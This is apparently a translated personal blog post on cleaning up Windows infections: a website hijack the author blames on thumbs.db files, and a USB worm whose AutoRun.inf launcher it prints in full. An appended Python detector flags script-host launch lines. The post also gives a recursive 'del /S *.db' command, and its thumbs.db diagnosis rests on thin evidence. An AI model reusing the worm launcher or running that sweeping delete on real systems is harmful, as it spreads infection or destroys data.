One clue gave me a lead: the site virtual directories all had a modification time of that day, and these sites could not all have been updated on the same day, so had every site been compromised? That seemed unlikely; or had the server been rooted? And why would only web pages be hijacked? I replaced the program with a backup, and the site still showed the hijack intermittently. I downloaded a fresh copy of the ThinkPHP framework and generated a project, and it was still hijacked; the program from the official ThinkPHP site could not possibly be infected. Then I cleared the hidden attribute on the virtual site folders, enabled showing hidden files, and found a thumbs.db file under every site. In theory thumbs.db is just a thumbnail cache file and should not cause any problem, but I had run out of other leads, so I deleted the file and visited the site: sure enough, the hijack was gone. The thumbs.db file was confirmed as the cause.
A Baidu search shows many opinions about thumbs.db. Baidu Baike: http://baike.baidu.com/link?url=9p0lOi4y1lqhluQNaR54KBhiWJhEUDMEcMXvkXkjm6X2FhJXDDL3gU38a04RxCJJNEtwyk_gKdlTGsO0q5WF8K Hudong Baike: http://www.baike.com/wiki/%E7%BC%A9%E7%95%A5%E5%9B%BE%E6%BC%8F%E6%B4%9E The vulnerability is evidently very dangerous: it is a Windows graphics interface remote code execution vulnerability. I tried copying the file out and scanning it with 360, Avira and various other web and server security products, and none of them reported anything. Patching server vulnerabilities is clearly very important.
A similar problem occurred once before, but I ignored it and did not look into the cause carefully, which led to multiple sites being hijacked this time. The fix is to configure the folder properties so that thumbnail caching is not allowed. Microsoft has also released a patch for the vulnerability, so apply that too. When I have time I will look into this advanced server vulnerability. It is a bizarre vulnerability; once hit, the cause is really hard to find.
Addendum: Microsoft's patch notes say it may allow privilege escalation. This file alone cannot escalate privileges; further interaction through the file is needed. If a server has already been hijacked or tampered with, the following batch command deletes the files in bulk, and the thumbnail-cache setting in the folder properties should be ticked (so that caching is disabled): del /S *.db

Manually removing a worm

Yesterday I was chatting online, and in the middle of it I went to my software drive to find a program; everything had turned into shortcuts and nothing else was shown. I had no antivirus running, so this had to be a virus at work. I deleted the shortcuts and then there was nothing left on the software drive, but what I had deleted were only shortcuts, so the files had to be hidden somewhere on the disk. I tried the DOS command ATTRIB with no effect; they still would not show. So I booted into a PE environment and could see the files there: every drive contained two files, AutoRun.inf and 1066705994.vbs. What does the first one, AutoRun.inf, do? I wrote an article earlier about changing a USB drive's icon, which uses this very file; it means auto-load, and a single click triggers it. First, why could I not see the files? Because both files carry the protected system file attribute. So in Folder Options choose "show all files and folders (including hidden ones)"; system files still will not show, and there is one more option, "hide protected operating system files"; untick that and we can see our folders instead of the shortcuts.
The contents of AutoRun.inf:
[AutoRun]
Shellexecute=WScript.exe 1066705994.vbs "AutoRun"
shell\open=HH(&O)
shell\open\command=WScript.exe 1066705994.vbs "AutoRun"
shell\open\Default=1
shell\explore=HHHHH(&X)
shell\explore\command=WScript.exe 1066705994.vbs "AutoRun"
This configuration file simply auto-launches the 1066705994.vbs script. Now let's look at the script's contents:
It is all garbage; unfortunately it needs decrypting, which takes two passes through the execute function. I will not go into the decryption; those who like to dig can study it. This topic is mainly about manually removing the worm.
This virus is actually quite crude, with no real destructive payload: it only turns the folders on every drive into shortcuts. Just untick "hide protected operating system files" so it can no longer hide itself, then delete these two files. Note that they must be deleted from every drive; if a single drive is missed it will reinfect all of them. Mine seems to have come from a USB drive. That is manual worm removal; this is a fairly low-level virus. I extracted the virus, downloaded 360 antivirus and scanned it, and the scanner reported nothing. Although it does no great harm to the computer it is still malicious, so you cannot rely entirely on antivirus. As the saying goes, "have no intent to harm others, but never drop your guard against them"; on a personal computer that becomes: never lack the intent to guard against viruses (keep your guard up against them), and never go without antivirus. Heh, it sounds like a tongue-twister. That is how I cleaned out this virus.
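The AutoRun.inf shown above is recognisable by its shape: every launch directive hands a .vbs to WScript.exe. As an added example, not part of the original post, here is a Python check that parses an AutoRun.inf and flags launch directives, rating those that go through a script host highest; the sample is a constructed copy of the file above and the helper names are hypothetical.

```python
import re

# Constructed copy of the AutoRun.inf shown above.
SAMPLE_INF = """[AutoRun]
Shellexecute=WScript.exe 1066705994.vbs "AutoRun"
shell\\open=HH(&O)
shell\\open\\command=WScript.exe 1066705994.vbs "AutoRun"
shell\\open\\Default=1
shell\\explore=HHHHH(&X)
shell\\explore\\command=WScript.exe 1066705994.vbs "AutoRun"
"""

# Script hosts / interpreters that have no business being launched from a drive's autorun.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe")

def parse_autorun(text):
    """Return the key/value pairs of the [AutoRun] section, keys lower-cased."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def autorun_findings(text):
    """Flag directives that launch something: open=, shellexecute= and any shell\\...\\command=.
    Returns (key, value, severity) tuples; severity is 'high' when a script host is the program."""
    findings = []
    for key, value in parse_autorun(text).items():
        launches = key in ("open", "shellexecute") or key.endswith("\\command")
        if not launches:
            continue
        parts = value.split()
        exe = parts[0].lower() if parts else ""
        severity = "high" if exe in SCRIPT_HOSTS else "medium"
        findings.append((key, value, severity))
    return findings

if __name__ == "__main__":
    for key, value, severity in autorun_findings(SAMPLE_INF):
        print(f"[{severity}] {key} = {value}")
```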